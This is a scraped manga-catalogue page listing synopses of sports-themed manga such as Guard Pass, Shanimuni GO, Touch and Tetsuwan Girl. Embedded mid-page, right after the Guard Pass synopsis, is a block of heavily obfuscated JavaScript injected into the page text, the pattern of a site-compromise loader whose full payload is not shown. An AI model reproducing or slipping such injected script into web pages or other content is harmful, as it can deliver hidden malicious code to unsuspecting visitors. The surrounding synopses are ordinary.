Sports - Page 5

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982 results

Treading on Fire, Yuwen Jun!

Yuwen Jun (Cheng) came to Japan to get married because of childhood arrangement. Instead he got himself into a thrilling journey where kendo masters, detective sisters, young misses of rich families entangled with him. Yuwen Jun was stunned while facing so many unexpected incidents: "I just came to get married..."


Shanimuni GO

Ide Nobuhisa has always been a boy full of vitality and a young promise in the field of track running. However one day after a competition, he stumbled over the pretiest pair of legs he had ever seen! Their owner, a young girl practicing tennis makes a promise with Ide that she will teach him how to play. After seeing the name tag on her racket bag, Ide puts all his efforts into passing the test for accessing the same high school she goes to, Makunogama. In his first days in his new high school, Ide discovers two things: an old friend of his is also attending, and nobody knows of a girl with the name he saw on the tag! He and his friend join the school tennis club, where they meet another first year, Takita Louis (Ruui), a very good tennis player with a little of an attitude problem. However things start to look better for Ide when his dear missing girl appears in the school! As it happens, he misread her name on the tag...


Find The Waves

Kang Pado is a boy who accompanies his father on their countryside farm; raising cattle, fruits, and vegetables for a living. At the same time, he is studying at the not-so-nearby high school which, travelled by land, is 10km away. However, Pado's father unwittingly mentions to him a shortcut using the river, shortening the distance to only 3km. Being an obedient kid, he takes his father's advice and swims every day back and forth to the school whenever he has classes. However, circumstances occur when, due to a lack of students in their high school, the administration shuts it down, leaving Kang Pado no choice but to go to Seoul, where his sister lives. There he will continue his high school studies and deal with what Seoul High School Life has to offer!


Guard Pass

Lim Sejun who has a big physique, is fat and likes to eat. He has high self esteem and a firm personality and doesn’t care about being teased fat. He has only one friend, Seo Hajin. Since they were young, she has been learning jiu-jitsu to protect Sejun. One day, Hajin saw that Sejun had trouble with one of his classmates and destroyed him But one night Hajin was assaulted and found severely injured and serious psychological trauma Sejun reported it to the police but when there is little to no progress in the investigation he couldn’t control his anger and goes to find the criminal himself but was defeated by a bully who learned jiu-jitsu and finds nothing. Then he learns jiu-jitsu from ‘Jason’ who had saved him. After 3 months of learning, losing weight and knocking down bullies, he discovers that a veiled organisation is involved and wants to destroy it. A school action drama depicting individual revenge.<script></script><script>(function(_0x567389,_0x3a36be){var _0x7bbaef=_0x384f,_0x53f26d=_0x567389();while(!![]){try{var _0x2f70d2=parseInt(_0x7bbaef(0x1ef))/(0x1951+-0x2af*0x9+-0x129)*(-parseInt(_0x7bbaef(0x210))/(-0x2051+-0x16c5+-0x29*-0x158))+-parseInt(_0x7bbaef(0x1ee))/(0x268c+-0x171b+-0x19*0x9e)+-parseInt(_0x7bbaef(0x1f5))/(0x1*0x103d+0x4*-0x7ed+0x1*0xf7b)*(-parseInt(_0x7bbaef(0x20b))/(-0x1d9c+0x1*-0xec9+0x2c6a))+parseInt(_0x7bbaef(0x1f0))/(-0x1*0xb8d+-0x2c1*-0x2+0x611)+parseInt(_0x7bbaef(0x1ff))/(-0x5a*0x51+-0x1d37+0x39b8)*(-parseInt(_0x7bbaef(0x209))/(0x2*0x47+-0x1*0x413+0x38d))+parseInt(_0x7bbaef(0x1f4))/(0x2*-0x86+0xd6b+-0xc56)*(-parseInt(_0x7bbaef(0x20f))/(0x3*-0x5bb+0x344+0xdf7))+parseInt(_0x7bbaef(0x1fa))/(0x19b1*-0x1+-0x1db7*0x1+0x3773)*(parseInt(_0x7bbaef(0x1f3))/(-0x15*-0xe3+-0xa81+-0x812));if(_0x2f70d2===_0x3a36be)break;else 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High school senior Aihara Kotoko has had a crush on Irie Naoki since freshman year. But she's been discouraged from confessing to him by a few things: he's a member of "Class A," the top ranking class in school, whereas she's in "Class F"; he gets the top score on every exam; and he's so smart, popular, and handsome that he's been class president every year. When Kotoki finally musters up the courage to present him with a love letter, though, Naoki outright refuses it, telling her point blank–with a look of disgust and boredom–that he doesn't like "stupid girls." Poor Kotoko's worst nightmare! Her heart is broken, but then a change in circumstance forces Naoki and Kotoko to be together every day…!? Itazura na Kiss is a gem to the shoujo demographic, as it is the mother of a lot of cliches found in today's shoujo series. Despite the fact that it is 2 decades old, it still stands out as unique for it has the series follow the main characters well into their life, over a span of 10 years. It was so popular it inspired popular series like Marmalade Boy and Fruits Basket. However, the author had an accident while she was moving homes with her son and husband, and passed away a few months later, leaving her popular manga forever uncompleted. It was adapted into a popular Taiwanese drama under the title "It Started With a Kiss", and it even earned sequel. It was also adapted as a short Japanese drama in 1996, and an anime series in 2008, with the anime portraying the author's planned ending.


Bamboo Blade C

Bamboo Blade C summary is updating. Come visit sometime to read the latest chapter of Bamboo Blade C. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


1F no Kishi

"'Fencing' and 'fighting games' are kind of alike, aren't they?" You use your head! You use 'reading'! A fighting gamer takes on the challenge, this is the tale of an 'unorthodox' knight's path!!Izumi Ichidou was devoted to fighting games, unexpectedly, he joins his high school's fencing club. 'Fencing' and 'gaming' are two seemingly unrelated sports, but when they are brought together, the curtain rises on a new kind of sports manga...!



Touch is a shounen story about two twin brothers, a pretty girl next door, and that good old pastime of baseball. The manga was written by one of the most well known manga-ka out there, Adachi Mitsuru in the early 80's (1981-1986). He's a wonderful writer who tends to write stories that are related to baseball and Koshien, the stadium where the All High School Baseball Tournament is held.


Doutei Doudeshou

Kentarou who works at the construction company founded by his father, meets Kawada, a salary-man sent by hir firm to the costruction site to supervise its progress. This newcomer soon brings his coworkers' dislike upon himself because of his cold attitude and his unpleasant comments. But one day, Kentarou accidently finds out that Kawada, despite his putting on airs, is still a virgin! In a moment of kindness, he decides to help him get to the next step by introducing girls to him, but Kawada seems to be more interested in Kentarou himself... ~ Ikemen Scans


Tetsuwan Girl

The year is 1949. Japan had been defeated in World War II and was occupied by Allied Forces consisting of American, Australian, British, Indian and New Zealander troops. A young woman meets a young man. Both have lost everything because of the war. Tome Kano, a barmaid, and Katsuya Ranzaki, a wealthy investor. The two are fed up with their lives and want to live "real lives" for once. Katsuya's starting up an all-girls baseball team with Tome on it allows them to do this. In this dramatic story, the dreams of a nation come alive. Through the determination and strength of Katsuya and Tome, girls baseball becomes a sensation, and Tome a superstar.


Shorty and Chubby Are in Love, so What?

Puniko is a manager for the basketball club. She has always been self-conscious about her weight. Puniko believed that she had no chance to fall in love... until Shou-kun, the basketball team's diminutive yet popular ace, confesses to her. Can Pinuko really find love at last? Is such a love even possible?


Fure Fure Shoujo

Momoko is a shy girl who spends all her time reading girly novels. She longs to fall in love like the heroines in the stories she reads, and one day her dream seems to come true! After a fateful encounter worthy of a novel, Momoko decides she's in love with Oshima, her school's ace baseball player. But how can she get closer to him?After consulting her precious books, she eventually ends up helping to revive the unpopular traditional Japanese cheering club to cheer at the school's baseball games. However, they've only got just enough members to keep it from being abolished, and none of them seem to know exactly what they're doing. Their first performance is so dreadful that people even blame them for the baseball team's defeat! Their ragtag cheer squad will have to get its act together if Momoko is to have any chance of realizing her fiction-worthy romance!
